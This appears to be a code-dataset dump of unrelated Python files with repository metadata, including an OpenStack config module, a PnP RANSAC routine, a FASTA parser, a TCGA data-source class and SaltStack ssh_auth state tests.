'zsql': ['Products.ZSQLMethods >= 3.0.0b1'],
},
test_loader='zope.testing.testrunner.eggsupport:SkipLayers',
test_suite='Products.%s' % NAME,
entry_points="""
[zope2.initialize]
Products.%s = Products.%s:initialize
[distutils.commands]
ftest = zope.testing.testrunner.eggsupport:ftest
""" % (NAME, NAME),
)
| 61 | 0 | 23 |
8c2f2b0b29a89361362b8c63b5f23ed318d65a4a | 3,030 | py | Python | nova/conf/osapi_v21.py | ebalduf/nova-backports | 6bf97ec73467de522d34ab7a17ca0e0874baa7f9 | ["Apache-2.0"] | null | null | null | nova/conf/osapi_v21.py | ebalduf/nova-backports | 6bf97ec73467de522d34ab7a17ca0e0874baa7f9 | ["Apache-2.0"] | null | null | null | nova/conf/osapi_v21.py | ebalduf/nova-backports | 6bf97ec73467de522d34ab7a17ca0e0874baa7f9 | ["Apache-2.0"] | 1 | 2020-03-01T17:04:57.000Z | 2020-03-01T17:04:57.000Z |
# Copyright 2015 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_config import cfg
api_opts = [
cfg.ListOpt("extensions_blacklist",
default=[],
deprecated_for_removal=True,
deprecated_group="osapi_v21",
help="""
*DEPRECATED*
This option is a list of all of the v2.1 API extensions to never load. However,
it will be removed in the near future, after which the all the functionality
that was previously in extensions will be part of the standard API, and thus
always accessible.
* Possible values:
A list of strings, each being the alias of an extension that you do not
wish to load.
* Services that use this:
``nova-api``
* Related options:
enabled, extensions_whitelist
"""),
cfg.ListOpt("extensions_whitelist",
default=[],
deprecated_for_removal=True,
deprecated_group="osapi_v21",
help="""
*DEPRECATED*
This is a list of extensions. If it is empty, then *all* extensions except
those specified in the extensions_blacklist option will be loaded. If it is not
empty, then only those extensions in this list will be loaded, provided that
they are also not in the extensions_blacklist option. Once this deprecated
option is removed, after which the all the functionality that was previously in
extensions will be part of the standard API, and thus always accessible.
* Possible values:
A list of strings, each being the alias of an extension that you wish to
load, or an empty list, which indicates that all extensions are to be run.
* Services that use this:
``nova-api``
* Related options:
enabled, extensions_blacklist
"""),
cfg.StrOpt("project_id_regex",
default=None,
deprecated_for_removal=True,
deprecated_group="osapi_v21",
help="""
*DEPRECATED*
This option is a string representing a regular expression (regex) that matches
the project_id as contained in URLs. If not set, it will match normal UUIDs
created by keystone.
* Possible values:
A string representing any legal regular expression
* Services that use this:
``nova-api``
* Related options:
None
"""),
]
api_opts_group = cfg.OptGroup(name="osapi_v21", title="API v2.1 Options")
| 28.317757 | 79 | 0.709571 | # Copyright 2015 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_config import cfg
api_opts = [
cfg.ListOpt("extensions_blacklist",
default=[],
deprecated_for_removal=True,
deprecated_group="osapi_v21",
help="""
*DEPRECATED*
This option is a list of all of the v2.1 API extensions to never load. However,
it will be removed in the near future, after which the all the functionality
that was previously in extensions will be part of the standard API, and thus
always accessible.
* Possible values:
A list of strings, each being the alias of an extension that you do not
wish to load.
* Services that use this:
``nova-api``
* Related options:
enabled, extensions_whitelist
"""),
cfg.ListOpt("extensions_whitelist",
default=[],
deprecated_for_removal=True,
deprecated_group="osapi_v21",
help="""
*DEPRECATED*
This is a list of extensions. If it is empty, then *all* extensions except
those specified in the extensions_blacklist option will be loaded. If it is not
empty, then only those extensions in this list will be loaded, provided that
they are also not in the extensions_blacklist option. Once this deprecated
option is removed, after which the all the functionality that was previously in
extensions will be part of the standard API, and thus always accessible.
* Possible values:
A list of strings, each being the alias of an extension that you wish to
load, or an empty list, which indicates that all extensions are to be run.
* Services that use this:
``nova-api``
* Related options:
enabled, extensions_blacklist
"""),
cfg.StrOpt("project_id_regex",
default=None,
deprecated_for_removal=True,
deprecated_group="osapi_v21",
help="""
*DEPRECATED*
This option is a string representing a regular expression (regex) that matches
the project_id as contained in URLs. If not set, it will match normal UUIDs
created by keystone.
* Possible values:
A string representing any legal regular expression
* Services that use this:
``nova-api``
* Related options:
None
"""),
]
api_opts_group = cfg.OptGroup(name="osapi_v21", title="API v2.1 Options")
def register_opts(conf):
conf.register_group(api_opts_group)
conf.register_opts(api_opts, api_opts_group)
def list_opts():
return {api_opts_group: api_opts}
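# --- Added usage sketch (not part of the original module) --------------------
# Shows how option definitions such as api_opts / api_opts_group above are
# typically registered and read back; assumes oslo.config is installed and the
# definitions above are in scope.
def _example_register_and_read():
    example_conf = cfg.ConfigOpts()
    example_conf.register_group(api_opts_group)
    example_conf.register_opts(api_opts, group=api_opts_group)
    example_conf([])  # parse an empty argv so the defaults become readable
    return example_conf.osapi_v21.extensions_blacklist  # -> [] by default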
| 125 | 0 | 46 |
bc50a54003ed4f378eba19789b209b5f23ec8ad4 | 1,813 | py | Python | SfM/Traditional/PnPRANSAC.py | akathpal/ComputerVision-CMSC733 | f5fa21a0ada8ab8ea08a6c558f6df9676570a2df | ["MIT"] | 1 | 2019-09-26T02:06:17.000Z | 2019-09-26T02:06:17.000Z | SfM/Traditional/PnPRANSAC.py | akathpal/UMD-CMSC733-ComputerVision | f5fa21a0ada8ab8ea08a6c558f6df9676570a2df | ["MIT"] | null | null | null | SfM/Traditional/PnPRANSAC.py | akathpal/UMD-CMSC733-ComputerVision | f5fa21a0ada8ab8ea08a6c558f6df9676570a2df | ["MIT"] | 1 | 2022-03-30T05:03:09.000Z | 2022-03-30T05:03:09.000Z |
"""Summary
"""
import numpy as np
import LinearPnP as LPnP
import random
from tqdm import tqdm
def proj3Dto2D(x3D, K, C, R):
"""Summary
Args:
x3D (TYPE): Description
K (TYPE): Description
C (TYPE): Description
R (TYPE): Description
Returns:
TYPE: Description
"""
C = C.reshape(-1, 1)
x3D = x3D.reshape(-1, 1)
# print("K", K.shape, R.shape, C.shape, x3D.shape)
P = np.dot(np.dot(K, R), np.hstack((np.identity(3), -C)))
X3D = np.vstack((x3D, 1))
# print("P",P.shape, X3D.shape)
u_rprj = (np.dot(P[0, :], X3D)).T / (np.dot(P[2, :], X3D)).T
v_rprj = (np.dot(P[1, :], X3D)).T / (np.dot(P[2, :], X3D)).T
X2D = np.hstack((u_rprj, v_rprj))
return X2D
def PnPRANSAC(X, x, K):
"""Summary
Args:
X (TYPE): Description
x (TYPE): Description
K (TYPE): Description
Returns:
TYPE: Description
"""
cnt = 0
M = x.shape[0]
threshold = 5 #6
x_ = LPnP.convertHomogeneouos(x)
Cnew = np.zeros((3, 1))
Rnew = np.identity(3)
for trails in tqdm(range(500)):
# random.randrange(0, len(corr_list))
random_idx = random.sample(range(M), 6)
C, R = LPnP.LinearPnP(X[random_idx][:], x[random_idx][:], K)
S = []
for j in range(M):
reprojection = proj3Dto2D(x_[j][:], K, C, R)
e = np.sqrt(
np.square((x_[j, 0]) - reprojection[0]) +
np.square((x_[j, 1] - reprojection[1])))
if e < threshold:
S.append(j)
countS = len(S)
if (cnt < countS):
cnt = countS
Rnew = R
Cnew = C
if (countS == M):
break
# print("Inliers = " + str(cnt) + "/" + str(M))
return Cnew, Rnew
| 24.173333 | 68 | 0.498621 | """Summary
"""
import numpy as np
import LinearPnP as LPnP
import random
from tqdm import tqdm
def proj3Dto2D(x3D, K, C, R):
"""Summary
Args:
x3D (TYPE): Description
K (TYPE): Description
C (TYPE): Description
R (TYPE): Description
Returns:
TYPE: Description
"""
C = C.reshape(-1, 1)
x3D = x3D.reshape(-1, 1)
# print("K", K.shape, R.shape, C.shape, x3D.shape)
P = np.dot(np.dot(K, R), np.hstack((np.identity(3), -C)))
X3D = np.vstack((x3D, 1))
# print("P",P.shape, X3D.shape)
u_rprj = (np.dot(P[0, :], X3D)).T / (np.dot(P[2, :], X3D)).T
v_rprj = (np.dot(P[1, :], X3D)).T / (np.dot(P[2, :], X3D)).T
X2D = np.hstack((u_rprj, v_rprj))
return X2D
def PnPRANSAC(X, x, K):
"""Summary
Args:
X (TYPE): Description
x (TYPE): Description
K (TYPE): Description
Returns:
TYPE: Description
"""
cnt = 0
M = x.shape[0]
threshold = 5 #6
x_ = LPnP.convertHomogeneouos(x)
Cnew = np.zeros((3, 1))
Rnew = np.identity(3)
for trails in tqdm(range(500)):
# random.randrange(0, len(corr_list))
random_idx = random.sample(range(M), 6)
C, R = LPnP.LinearPnP(X[random_idx][:], x[random_idx][:], K)
S = []
for j in range(M):
reprojection = proj3Dto2D(x_[j][:], K, C, R)
e = np.sqrt(
np.square((x_[j, 0]) - reprojection[0]) +
np.square((x_[j, 1] - reprojection[1])))
if e < threshold:
S.append(j)
countS = len(S)
if (cnt < countS):
cnt = countS
Rnew = R
Cnew = C
if (countS == M):
break
# print("Inliers = " + str(cnt) + "/" + str(M))
return Cnew, Rnew
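# --- Added illustration (not part of the original file) ----------------------
# A small, self-contained numpy example of the reprojection test used inside the
# RANSAC loop above: project one 3D point with P = K R [I | -C] and compare the
# pixel error against the threshold. All numbers below are made up.
import numpy as np
K_demo = np.array([[800.0, 0.0, 320.0], [0.0, 800.0, 240.0], [0.0, 0.0, 1.0]])
R_demo = np.identity(3)
C_demo = np.zeros((3, 1))
P_demo = np.dot(np.dot(K_demo, R_demo), np.hstack((np.identity(3), -C_demo)))
X_demo = np.array([[0.1], [0.2], [5.0], [1.0]])  # homogeneous 3D point
x_proj = np.dot(P_demo, X_demo)
u_demo = x_proj[0, 0] / x_proj[2, 0]
v_demo = x_proj[1, 0] / x_proj[2, 0]
err_demo = np.sqrt((u_demo - 336.0) ** 2 + (v_demo - 272.0) ** 2)  # distance to a fake measurement
print("u=%.1f v=%.1f inlier=%s" % (u_demo, v_demo, err_demo < 5))  # -> u=336.0 v=272.0 inlier=True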
| 0 | 0 | 0 |
91209b23eab8a5ab7f587d0930191fdd2e862962 | 965 | py | Python | setup.py | mefsantos/branch-testing | 04c944950fc5d4ebafc32d27f7e08bd760b89e66 | [
"Unlicense"
] | null | null | null | setup.py | mefsantos/branch-testing | 04c944950fc5d4ebafc32d27f7e08bd760b89e66 | [
"Unlicense"
] | null | null | null | setup.py | mefsantos/branch-testing | 04c944950fc5d4ebafc32d27f7e08bd760b89e66 | [
"Unlicense"
] | null | null | null | #!/usr/bin/env python
from setuptools import setup
from setuptools.command.develop import develop
from setuptools.command.install import install
def friendly(command_subclass):
"""
A decorator for classes subclassing one of the setuptools commands.
It modifies the run() method so that it prints a friendly greeting.
"""
orig_run = command_subclass.run
command_subclass.run = modified_run
return command_subclass
@friendly
setup(name='myPackage',
version='0.1',
description='My first python package',
author='Marcelo Santos',
author_email='email@domain.com',
url='https://github.com/mefsantos/branch-testing',
packages=['.', 'modules'],
# Extension('foo', ['src/foo1.c', 'src/foo2.c']),
cmdclass={
'install': CustomInstallCommand,
},
)
| 21.931818 | 71 | 0.699482 | #!/usr/bin/env python
from setuptools import setup
from setuptools.command.develop import develop
from setuptools.command.install import install
def friendly(command_subclass):
"""
A decorator for classes subclassing one of the setuptools commands.
It modifies the run() method so that it prints a friendly greeting.
"""
orig_run = command_subclass.run
def modified_run(self):
print "Modified setup run"
orig_run(self)
command_subclass.run = modified_run
return command_subclass
@friendly
class CustomInstallCommand(install):
print "User instalation"
pass
setup(name='myPackage',
version='0.1',
description='My first python package',
author='Marcelo Santos',
author_email='email@domain.com',
url='https://github.com/mefsantos/branch-testing',
packages=['.', 'modules'],
# Extension('foo', ['src/foo1.c', 'src/foo2.c']),
cmdclass={
'install': CustomInstallCommand,
},
)
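# --- Added illustration (not part of the original file) ----------------------
# The same "wrap the run() method" idea as the @friendly decorator above, shown
# on a plain class so it runs without setuptools.
def _announce(cls):
    orig_run = cls.run
    def wrapped_run(self):
        print("about to run")
        orig_run(self)
    cls.run = wrapped_run
    return cls
@_announce
class _DemoTask(object):
    def run(self):
        print("running")
_DemoTask().run()  # prints "about to run" then "running"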
| 48 | 47 | 46 |
be4cbce6f0215362dc8c07de53a409e097b2847d | 102 | py | Python | tests/__init__.py | iteg-hq/pystaticsql | cb2c61d49e5ef33c33c99f6f26da0e55b78696f2 | ["MIT"] | null | null | null | tests/__init__.py | iteg-hq/pystaticsql | cb2c61d49e5ef33c33c99f6f26da0e55b78696f2 | ["MIT"] | null | null | null | tests/__init__.py | iteg-hq/pystaticsql | cb2c61d49e5ef33c33c99f6f26da0e55b78696f2 | ["MIT"] | null | null | null |
import sys
import os
sys.path.append(os.path.join(os.path.dirname(__file__), os.pardir, 'staticsql')) | 25.5 | 80 | 0.764706 | import sys
import os
sys.path.append(os.path.join(os.path.dirname(__file__), os.pardir, 'staticsql')) | 0 | 0 | 0 |
abb474a9f34b3f34295c3057977ccfd213b24757 | 2,576 | py | Python | source/_static/code/fasta_object.py | C3BI-pasteur-fr/python-solutions-1 | 4f476d4e8b636f9e4480437f776c528666fad96a | ["CC0-1.0"] | null | null | null | source/_static/code/fasta_object.py | C3BI-pasteur-fr/python-solutions-1 | 4f476d4e8b636f9e4480437f776c528666fad96a | ["CC0-1.0"] | null | null | null | source/_static/code/fasta_object.py | C3BI-pasteur-fr/python-solutions-1 | 4f476d4e8b636f9e4480437f776c528666fad96a | ["CC0-1.0"] | null | null | null |
if __name__ == '__main__':
import sys
import os.path
if len(sys.argv) != 2:
sys.exit("usage fasta_object fasta_path")
fasta_path = sys.argv[1]
if not os.path.exists(fasta_path):
sys.exit("No such file: {}".format(fasta_path))
fasta_parser = FastaParser(fasta_path)
for sequence in fasta_parser:
print "----------------"
print "{seqid} = {gc:.3%}".format(gc=sequence.gc_percent(),
seqid = sequence.id) | 32.2 | 74 | 0.53222 | class Sequence(object):
def __init__(self, id_, sequence, comment=''):
self.id = id_
self.comment = comment
self.sequence = sequence
def gc_percent(self):
seq = self.sequence.upper()
return float(seq.count('G') + seq.count('C')) / float(len(seq))
class FastaParser(object):
def __init__(self, fasta_path):
self.path = fasta_path
self._file = open(fasta_path)
self._current_id = ''
self._current_comment = ''
self._current_sequence = ''
def _parse_header(self, line):
"""
parse the header line and _current_id|comment|sequence attributes
:param line: the line of header in fasta format
:type line: string
"""
header = line.split()
self._current_id = header[0][1:]
self._current_comment = ' '.join(header[1:])
self._current_sequence = ''
def __iter__(self):
return self
def next(self):
"""
:return: at each call return a new :class:`Sequence` object
:raise: StopIteration
"""
for line in self._file:
if line.startswith('>'):
# a new sequence begin
if self._current_id != '':
new_seq = Sequence(self._current_id,
self._current_sequence,
comment=self._current_comment)
self._parse_header(line)
return new_seq
else:
self._parse_header(line)
else:
self._current_sequence += line.strip()
if not self._current_id and not self._current_sequence:
self._file.close()
raise StopIteration()
else:
new_seq = Sequence(self._current_id,
self._current_sequence,
comment=self._current_comment)
self._current_id = ''
self._current_sequence = ''
return new_seq
if __name__ == '__main__':
import sys
import os.path
if len(sys.argv) != 2:
sys.exit("usage fasta_object fasta_path")
fasta_path = sys.argv[1]
if not os.path.exists(fasta_path):
sys.exit("No such file: {}".format(fasta_path))
fasta_parser = FastaParser(fasta_path)
for sequence in fasta_parser:
print "----------------"
print "{seqid} = {gc:.3%}".format(gc=sequence.gc_percent(),
seqid = sequence.id) | 417 | 1,554 | 99 |
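# --- Added worked example (not part of the original file) --------------------
# Sequence.gc_percent() above is simply (#G + #C) / length; for a 10-base
# sequence with 5 G/C bases that gives 0.5:
_demo_seq = "ATGCGCGTTA".upper()
_demo_gc = float(_demo_seq.count('G') + _demo_seq.count('C')) / float(len(_demo_seq))
print("{0:.3%}".format(_demo_gc))  # -> 50.000%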
b9b417b80dc5364aedd894415852090ddedf5d18 | 568 | py | Python | ex034.py | AleLucasG/Estudos-Python-I | 4144033bb77b06dd1c9c56a36d5bb152295a6be6 | ["MIT"] | null | null | null | ex034.py | AleLucasG/Estudos-Python-I | 4144033bb77b06dd1c9c56a36d5bb152295a6be6 | ["MIT"] | null | null | null | ex034.py | AleLucasG/Estudos-Python-I | 4144033bb77b06dd1c9c56a36d5bb152295a6be6 | ["MIT"] | null | null | null |
""" Write a program that asks for an employee's salary and computes the value of the raise.
Salaries above R$1,250.00 get a 10% raise; those at or below that amount get 15%."""
salario = float(input('Qual valor do seu salario R$ '))
if salario <= 1250:
    aumento = (salario * 15) / 100
    print('Seu aumento foi de 15% e seu salario atual é de R$ {:.2f}'.format(aumento + salario))
else:
    aumento = (salario * 10) / 100
    print('Seu aumento foi de 10% e seu salario atual é de R$ {:.2f}'.format(aumento + salario))
| 33.411765 | 118 | 0.683099 | """ Write a program that asks for an employee's salary and computes the value of the raise.
Salaries above R$1,250.00 get a 10% raise; those at or below that amount get 15%."""
salario = float(input('Qual valor do seu salario R$ '))
if salario <= 1250:
    aumento = (salario * 15) / 100
    print('Seu aumento foi de 15% e seu salario atual é de R$ {:.2f}'.format(aumento + salario))
else:
    aumento = (salario * 10) / 100
    print('Seu aumento foi de 10% e seu salario atual é de R$ {:.2f}'.format(aumento + salario))
| 0 | 0 | 0 |
c5d0c24a15150b3cdda7f3912e703b749d6efcab | 1,413 | py | Python | lib/od/identity/onedrive_vercel_index.py | ZimCodes/Zyod | 5f9e2138cef01930fdf8d29269495f862c183ccb | ["MIT"] | 1 | 2022-03-19T19:12:58.000Z | 2022-03-19T19:12:58.000Z | lib/od/identity/onedrive_vercel_index.py | ZimCodes/Zyod | 5f9e2138cef01930fdf8d29269495f862c183ccb | ["MIT"] | 1 | 2022-03-23T12:21:28.000Z | 2022-03-24T02:18:45.000Z | lib/od/identity/onedrive_vercel_index.py | ZimCodes/Zyod | 5f9e2138cef01930fdf8d29269495f862c183ccb | ["MIT"] | null | null | null |
from .base_identity import BaseIdentity
from ...driver.support.driver_support import DriverSupport
class OneDriveVercelIndex(BaseIdentity):
"""OneDriveVercelIndex object to identify said OD"""
@staticmethod
@staticmethod
def _footer(driver) -> bool:
"""Check for the 'powered by onedrive-vercel-index' tagline
:param WebDriver driver: Selenium WebDriver
:return:
"""
return OneDriveVercelIndex._attr_check(driver, "main + div a[href]", "href",
"spencerwooo/onedrive-vercel-index")
@staticmethod
def _meta_tag(driver) -> bool:
"""Search meta tag for id
:param WebDriver driver: Selenium WebDriver
:return:
"""
element = DriverSupport.get_element(driver, 'meta[content="OneDrive Vercel Index"]', "")
return bool(element)
@staticmethod
def _flag_crumb(driver) -> bool:
"""Finds id of the through its iconic flag
:param WebDriver driver: Selenium WebDriver
:return:
"""
element = DriverSupport.get_element(driver, r"div.dark\:text-gray-300 div a", "")
return OneDriveVercelIndex._text_check(element, "🚩 Home")
| 33.642857 | 96 | 0.64402 | from .base_identity import BaseIdentity
from ...driver.support.driver_support import DriverSupport
class OneDriveVercelIndex(BaseIdentity):
"""OneDriveVercelIndex object to identify said OD"""
@staticmethod
def is_od(driver) -> bool:
return OneDriveVercelIndex._footer(driver) or OneDriveVercelIndex._meta_tag(driver) or \
OneDriveVercelIndex._flag_crumb(driver)
@staticmethod
def _footer(driver) -> bool:
"""Check for the 'powered by onedrive-vercel-index' tagline
:param WebDriver driver: Selenium WebDriver
:return:
"""
return OneDriveVercelIndex._attr_check(driver, "main + div a[href]", "href",
"spencerwooo/onedrive-vercel-index")
@staticmethod
def _meta_tag(driver) -> bool:
"""Search meta tag for id
:param WebDriver driver: Selenium WebDriver
:return:
"""
element = DriverSupport.get_element(driver, 'meta[content="OneDrive Vercel Index"]', "")
return bool(element)
@staticmethod
def _flag_crumb(driver) -> bool:
"""Finds id of the through its iconic flag
:param WebDriver driver: Selenium WebDriver
:return:
"""
element = DriverSupport.get_element(driver, r"div.dark\:text-gray-300 div a", "")
return OneDriveVercelIndex._text_check(element, "🚩 Home")
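# --- Added illustration (not part of the original file) ----------------------
# A selenium-free sketch of the kind of fingerprinting _footer() performs: treat
# a page as an onedrive-vercel-index deployment when a footer link points at the
# upstream repository. The hrefs below are made-up sample data.
def _looks_like_onedrive_vercel_index(footer_hrefs):
    return any('spencerwooo/onedrive-vercel-index' in href for href in footer_hrefs)
print(_looks_like_onedrive_vercel_index(
    ['https://github.com/spencerwooo/onedrive-vercel-index']))  # -> True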
| 157 | 0 | 26 |
4f8cf2874f900c610e1a276ea22e8e8ecd208a6f | 3,534 | py | Python | mev/api/public_data/sources/gdc/tcga.py | hsph-qbrc/mev-backend | c381800aa7d53d7256e89a4db5a0f9444264e9a6 | ["MIT"] | null | null | null | mev/api/public_data/sources/gdc/tcga.py | hsph-qbrc/mev-backend | c381800aa7d53d7256e89a4db5a0f9444264e9a6 | ["MIT"] | null | null | null | mev/api/public_data/sources/gdc/tcga.py | hsph-qbrc/mev-backend | c381800aa7d53d7256e89a4db5a0f9444264e9a6 | ["MIT"] | null | null | null |
import copy
import re
import json
import logging
import requests
import datetime
import shutil
import os
import tarfile
import uuid
import pandas as pd
from django.conf import settings
from api.utilities.basic_utils import get_with_retry, \
make_local_directory
from .gdc import GDCDataSource, GDCRnaSeqDataSourceMixin
logger = logging.getLogger(__name__)
class TCGADataSource(GDCDataSource):
'''
A general class for pulling data from TCGA, exposed via the GDC API
'''
# All the TCGA-based data will be stored in this directory
ROOT_DIR = os.path.join(settings.PUBLIC_DATA_DIR, 'tcga')
def get_additional_metadata(self):
'''
For the TCGA datasets, we would like an additional mapping from the shorthand ID
(e.g. TCGA-LUAD) to the "full" name (e.g. lung adenocarcinoma)
'''
mapping = self.query_for_project_names_within_program('TCGA')
return {'tcga_type_to_name_map': mapping}
class TCGARnaSeqDataSource(TCGADataSource, GDCRnaSeqDataSourceMixin):
'''
A specific implementation of the TCGA data source specific to
RNA-seq.
'''
# A short name (string) which can be used as a "title" for the dataset
PUBLIC_NAME = 'TCGA RNA-Seq'
# A longer, more descriptive text explaining the datasource:
DESCRIPTION = ('TCGA RNA-Seq expression data as processed by the'
' Genomic Data Commons'
' <a href="https://docs.gdc.cancer.gov/Data/Bioinformatics_Pipelines/Expression_mRNA_Pipeline/">'
' mRNA analysis pipeline</a>. Quantifications from this pipeline'
' are produced by HTSeq.'
)
# a string which will make it obvious where the data has come from. For example, we can use
# this tag to name an output file produced by this class (e.g. the count matrix).
# We also use this tag
TAG = 'tcga-rnaseq'
# An example of how one might query this dataset, so we can provide useful
# help for dataset creation errors:
EXAMPLE_PAYLOAD = {
'TCGA-UVM': ["<UUID>","<UUID>"],
'TCGA-MESO': ["<UUID>","<UUID>", "<UUID>"]
}
def prepare(self):
'''
Entry method for downloading and munging the TCGA RNA-seq dataset
to a HDF5 file
'''
self._pull_data('TCGA', self.TAG)
def get_additional_metadata(self):
'''
This just uses the parent method which maps the TCGA IDs to
the name (e.g. TCGA-LUAD --> Lung adenocarcinoma)
'''
# uses the get_additional_metadata method of TCGADataSource
# per python's MRO
return super().get_additional_metadata() | 33.028037 | 105 | 0.676853 | import copy
import re
import json
import logging
import requests
import datetime
import shutil
import os
import tarfile
import uuid
import pandas as pd
from django.conf import settings
from api.utilities.basic_utils import get_with_retry, \
make_local_directory
from .gdc import GDCDataSource, GDCRnaSeqDataSourceMixin
logger = logging.getLogger(__name__)
class TCGADataSource(GDCDataSource):
'''
A general class for pulling data from TCGA, exposed via the GDC API
'''
# All the TCGA-based data will be stored in this directory
ROOT_DIR = os.path.join(settings.PUBLIC_DATA_DIR, 'tcga')
def __init__(self):
if not os.path.exists(self.ROOT_DIR):
logger.info('When instantiating an instance of TCGADataSource, the'
' expected directory did not exist. Go create it...'
)
make_local_directory(self.ROOT_DIR)
def download_and_prep_dataset(self):
pass
def get_additional_metadata(self):
'''
For the TCGA datasets, we would like an additional mapping from the shorthand ID
(e.g. TCGA-LUAD) to the "full" name (e.g. lung adenocarcinoma)
'''
mapping = self.query_for_project_names_within_program('TCGA')
return {'tcga_type_to_name_map': mapping}
class TCGARnaSeqDataSource(TCGADataSource, GDCRnaSeqDataSourceMixin):
'''
A specific implementation of the TCGA data source specific to
RNA-seq.
'''
# A short name (string) which can be used as a "title" for the dataset
PUBLIC_NAME = 'TCGA RNA-Seq'
# A longer, more descriptive text explaining the datasource:
DESCRIPTION = ('TCGA RNA-Seq expression data as processed by the'
' Genomic Data Commons'
' <a href="https://docs.gdc.cancer.gov/Data/Bioinformatics_Pipelines/Expression_mRNA_Pipeline/">'
' mRNA analysis pipeline</a>. Quantifications from this pipeline'
' are produced by HTSeq.'
)
# a string which will make it obvious where the data has come from. For example, we can use
# this tag to name an output file produced by this class (e.g. the count matrix).
# We also use this tag
TAG = 'tcga-rnaseq'
# An example of how one might query this dataset, so we can provide useful
# help for dataset creation errors:
EXAMPLE_PAYLOAD = {
'TCGA-UVM': ["<UUID>","<UUID>"],
'TCGA-MESO': ["<UUID>","<UUID>", "<UUID>"]
}
def __init__(self):
super().__init__()
self.date_str = datetime.datetime.now().strftime('%m%d%Y')
def prepare(self):
'''
Entry method for downloading and munging the TCGA RNA-seq dataset
to a HDF5 file
'''
self._pull_data('TCGA', self.TAG)
def create_from_query(self, dataset_db_instance, query_filter, output_name = ''):
return GDCRnaSeqDataSourceMixin.create_from_query(
self, dataset_db_instance, query_filter, output_name
)
def verify_files(self, file_dict):
return GDCRnaSeqDataSourceMixin.verify_files(self, file_dict)
def get_indexable_files(self, file_dict):
return GDCRnaSeqDataSourceMixin.get_indexable_files(self, file_dict)
def get_additional_metadata(self):
'''
This just uses the parent method which maps the TCGA IDs to
the name (e.g. TCGA-LUAD --> Lung adenocarcinoma)
'''
# uses the get_additional_metadata method of TCGADataSource
# per python's MRO
return super().get_additional_metadata() | 749 | 0 | 162 |
3364b33b85badd5f70d904a4134808f39e3df4a1 | 3,996 | py | Python | tests/integration/states/test_ssh_auth.py | fake-name/salt | d8f04936e4407f51946e32e8166159778f6c31a5 | ["Apache-2.0"] | 1 | 2021-09-06T00:14:04.000Z | 2021-09-06T00:14:04.000Z | tests/integration/states/test_ssh_auth.py | fake-name/salt | d8f04936e4407f51946e32e8166159778f6c31a5 | ["Apache-2.0"] | 2 | 2021-04-30T21:17:57.000Z | 2021-12-13T20:40:23.000Z | tests/integration/states/test_ssh_auth.py | fake-name/salt | d8f04936e4407f51946e32e8166159778f6c31a5 | ["Apache-2.0"] | null | null | null |
# -*- coding: utf-8 -*-
"""
Test the ssh_auth states
"""
# Import python libs
from __future__ import absolute_import, print_function, unicode_literals
import os
# Import salt libs
import salt.utils.files
# Import Salt Testing libs
from tests.support.case import ModuleCase
from tests.support.helpers import destructiveTest, skip_if_not_root, with_system_user
from tests.support.mixins import SaltReturnAssertsMixin
from tests.support.runtests import RUNTIME_VARS
from tests.support.unit import skipIf
| 35.678571 | 86 | 0.63013 | # -*- coding: utf-8 -*-
"""
Test the ssh_auth states
"""
# Import python libs
from __future__ import absolute_import, print_function, unicode_literals
import os
# Import salt libs
import salt.utils.files
# Import Salt Testing libs
from tests.support.case import ModuleCase
from tests.support.helpers import destructiveTest, skip_if_not_root, with_system_user
from tests.support.mixins import SaltReturnAssertsMixin
from tests.support.runtests import RUNTIME_VARS
from tests.support.unit import skipIf
class SSHAuthStateTests(ModuleCase, SaltReturnAssertsMixin):
@destructiveTest
@skip_if_not_root
@with_system_user("issue_7409", on_existing="delete", delete=True)
@skipIf(True, "SLOWTEST skip")
def test_issue_7409_no_linebreaks_between_keys(self, username):
userdetails = self.run_function("user.info", [username])
user_ssh_dir = os.path.join(userdetails["home"], ".ssh")
authorized_keys_file = os.path.join(user_ssh_dir, "authorized_keys")
ret = self.run_state(
"file.managed",
name=authorized_keys_file,
user=username,
makedirs=True,
contents_newline=False,
# Explicit no ending line break
contents="ssh-rsa AAAAB3NzaC1kc3MAAACBAL0sQ9fJ5bYTEyY== root",
)
ret = self.run_state(
"ssh_auth.present",
name="AAAAB3NzaC1kcQ9J5bYTEyZ==",
enc="ssh-rsa",
user=username,
comment=username,
)
self.assertSaltTrueReturn(ret)
self.assertSaltStateChangesEqual(ret, {"AAAAB3NzaC1kcQ9J5bYTEyZ==": "New"})
with salt.utils.files.fopen(authorized_keys_file, "r") as fhr:
self.assertEqual(
fhr.read(),
"ssh-rsa AAAAB3NzaC1kc3MAAACBAL0sQ9fJ5bYTEyY== root\n"
"ssh-rsa AAAAB3NzaC1kcQ9J5bYTEyZ== {0}\n".format(username),
)
@destructiveTest
@skip_if_not_root
@with_system_user("issue_10198", on_existing="delete", delete=True)
@skipIf(True, "SLOWTEST skip")
def test_issue_10198_keyfile_from_another_env(self, username=None):
userdetails = self.run_function("user.info", [username])
user_ssh_dir = os.path.join(userdetails["home"], ".ssh")
authorized_keys_file = os.path.join(user_ssh_dir, "authorized_keys")
key_fname = "issue_10198.id_rsa.pub"
# Create the keyfile that we expect to get back on the state call
with salt.utils.files.fopen(
os.path.join(RUNTIME_VARS.TMP_PRODENV_STATE_TREE, key_fname), "w"
) as kfh:
kfh.write("ssh-rsa AAAAB3NzaC1kcQ9J5bYTEyZ== {0}\n".format(username))
# Create a bogus key file on base environment
with salt.utils.files.fopen(
os.path.join(RUNTIME_VARS.TMP_STATE_TREE, key_fname), "w"
) as kfh:
kfh.write("ssh-rsa BAAAB3NzaC1kcQ9J5bYTEyZ== {0}\n".format(username))
ret = self.run_state(
"ssh_auth.present",
name="Setup Keys",
source="salt://{0}?saltenv=prod".format(key_fname),
enc="ssh-rsa",
user=username,
comment=username,
)
self.assertSaltTrueReturn(ret)
with salt.utils.files.fopen(authorized_keys_file, "r") as fhr:
